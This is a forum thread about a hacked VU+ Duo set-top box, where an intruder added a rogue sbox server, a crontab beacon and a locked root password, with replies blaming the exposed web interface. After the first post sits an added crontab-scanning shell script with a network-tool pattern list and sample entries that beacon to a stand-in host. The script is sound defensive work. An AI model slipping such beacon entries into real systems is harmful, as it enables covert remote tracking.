VU duo was hacked this week


10 replies to this topic

#1 linuxgeek

  • Senior Member
  • 65 posts

+1
Neutral

Posted 21 October 2013 - 21:01

I found a rogue user and server in my sbox config today

I know I was not there last week as checked it before going on a week's holiday

the scum bag has even put a line in the crontab to update their server of any ip changes to

guess they did not know my dns details or did not want to lose the connection if I changed it

I also found that my root pass would not change even though passwd said it had

have not re flashed and set a new pass and dns / port to be sure

thing is I have no idea how they got in / found me as I know the 5 people who connect to my sbox personally so it's not like I'm touting on the big CS sites

is it possible that the attack has come in via TSmedia as I installed this and only started to use it a week ago made no other changes to the system
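A defender's check for the kind of rogue crontab line described in the post above, as an added example that is not part of the original thread: it reads a crontab and reports entries that run a network tool, name a URL, or carry a literal IP address. The function names, the tool list and the sample crontab (with its reserved example host and address) are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag cron entries that reach out to the network.
# The tool list and patterns are illustrative assumptions, not a complete set.
NET_TOOLS='wget|curl|nc|netcat|telnet|ftpget|ftpput|tftp|ssh|scp'

# Read a crontab on stdin; print "label:lineno: entry" for each active entry
# that runs a network tool, names a URL, or contains a literal IPv4 address.
scan_crontab() {
    awk -v label="$1" -v tools="$NET_TOOLS" '
        /^[ \t]*#/ || /^[ \t]*$/      { next }   # comments and blank lines
        /^[ \t]*[A-Za-z_]+[ \t]*=/    { next }   # VAR=value settings
        {
            line = " " $0 " "                    # pad so tools match at either end
            hit = 0
            if (line ~ ("[ \t/;|&](" tools ")[ \t;|&]"))     hit = 1
            if (line ~ /[a-z]+:\/\//)                        hit = 1
            if (line ~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/)     hit = 1
            if (hit) printf "%s:%d: %s\n", label, NR, $0
        }'
}

# Constructed sample crontab (hypothetical entries, not taken from the thread).
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
MAILTO=root
0 4 * * * /usr/bin/epg-refresh.sh
*/10 * * * * wget -q -O /dev/null "http://updates.example.invalid/ip.php?box=1"
30 2 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
*/15 * * * * /bin/sh /tmp/.x/report.sh 203.0.113.7
EOF
}

# Demo run over the constructed sample.
sample_crontab | scan_crontab sample
```

On a real box, feed it the crontab file itself, for example `scan_crontab root < path/to/root-crontab`; where that file lives depends on the image. A hit is a prompt to read the entry, not proof of compromise.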



Re: VU duo was hacked this week #2 WanWizard

  • PLi® Core member
  • 70,993 posts

+1,837
Excellent

Posted 21 October 2013 - 21:12

What else do you have open to the internet? ssh? ftp? webif? something else? No password on the webif? Used a standard or guessable password?


Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Ultimate (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)

Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.

Many answers to your question can be found in our new and improved wiki.


Re: VU duo was hacked this week #3 linuxgeek

  • Senior Member
  • 65 posts

+1
Neutral

Posted 21 October 2013 - 21:22

did not use standard passwords or ports

 

passwords were not standard containing numbers and letters

 

did have a port open for webif but was not port 80 

 

is the web interface considered insecure ?


Edited by linuxgeek, 21 October 2013 - 21:23.


Re: VU duo was hacked this week #4 WanWizard

  • PLi® Core member
  • 70,993 posts

+1,837
Excellent

Posted 21 October 2013 - 21:24

I don't know, it's a 3rd party application, but I find it unlikely that files are edited via the webif.




Re: VU duo was hacked this week #5 betacentauri

  • PLi® Core member
  • 7,185 posts

+323
Excellent

Posted 21 October 2013 - 21:33

Only webif and not ftp, ssh, telnet,... port?
Xtrend ET-9200, ET-8000, ET-10000, OpenPliPC on Ubuntu 12.04

Re: VU duo was hacked this week #6 linuxgeek

  • Senior Member
  • 65 posts

+1
Neutral

Posted 21 October 2013 - 21:39

only web and a port of sbox nothing else there is no way I would open ftp or telnet



Re: VU duo was hacked this week #7 Sjaaky

  • Senior Member
  • 7,443 posts

+41
Good

Posted 21 October 2013 - 21:48

I don't consider the webif safe to open up to the internet. I don't know about any concrete exploits. But given the amount of exploits in software which was designed with security in mind, I would be surprised if the webif is free of exploits.

Re: VU duo was hacked this week #8 theparasol

  • Senior Member
  • 4,157 posts

+198
Excellent

Posted 21 October 2013 - 21:54

Just use vpn to connect to your lan and don't use portforwarding wan->lan


@Camping: ZGemma H.2S, Technisat Multytenne 4-in-1 @Home: Edision Mini 4K, Wave Frontier T55, EMP Centauri EMP DiSEqC 8/1 switch, 4x Inverto Ultra Black single LNB


Re: VU duo was hacked this week #9 mge

  • Senior Member
  • 102 posts

0
Neutral

Posted 23 October 2013 - 17:35

check your router, there is a botnet out. it makes a portforwarding from your router to your stb. from there it looks for interesting data. Read the article:

 

http://www.heise.de/...er-1960334.html


Edited by mge, 23 October 2013 - 17:38.

ET4000
PLi-HD Skin

Re: VU duo was hacked this week #10 Pr2

  • PLi® Contributor
  • 6,200 posts

+261
Excellent

Posted 23 October 2013 - 18:35

This is not a botnet or whatever issue, he says that he created a port forwarding himself.

This is a very bad idea to open up any webif STB, softcam or whatever but people don't understand what they do and the risk they take, they think that by using non standard port they are protected...



Sat: Hotbird 13.0E, Astra 19.2E, Eutelsat5A 5.0W
VU+ Solo 4K: 2*DVB-S2 + 2*DVB-C/T/T2 (used in DVB-C) & Duo 4K: 2*DVB-S2X + DVB-C (FBC)

AB-Com: PULSe 4K 1*DVB-S2X (+ DVB-C/T/T2)
Edision OS Mio 4K: 1*DVB-S2X + 1*DVB-C/T/T2
 


Re: VU duo was hacked this week #11 MiLo

  • PLi® Core member
  • 14,055 posts

+298
Excellent

Posted 23 October 2013 - 19:48

I always tell the same: SSH is safe. The rest is not.

 

Then usually people go "but this but that but ...", thinking they know better because their second cousin has a friend who had been married to the sister of a guy who worked for the NSA and he said it was safe. Then there's nothing more to say but "Well it's your gun, it's your foot, go ahead."

 

You should not forward ports from the internet to your box to any port but 22 (ssh). For the same reason you should not take a shotgun, point it at your left foot, and pull the trigger. It hurts. That's why.


Real musicians never die - they just decompose

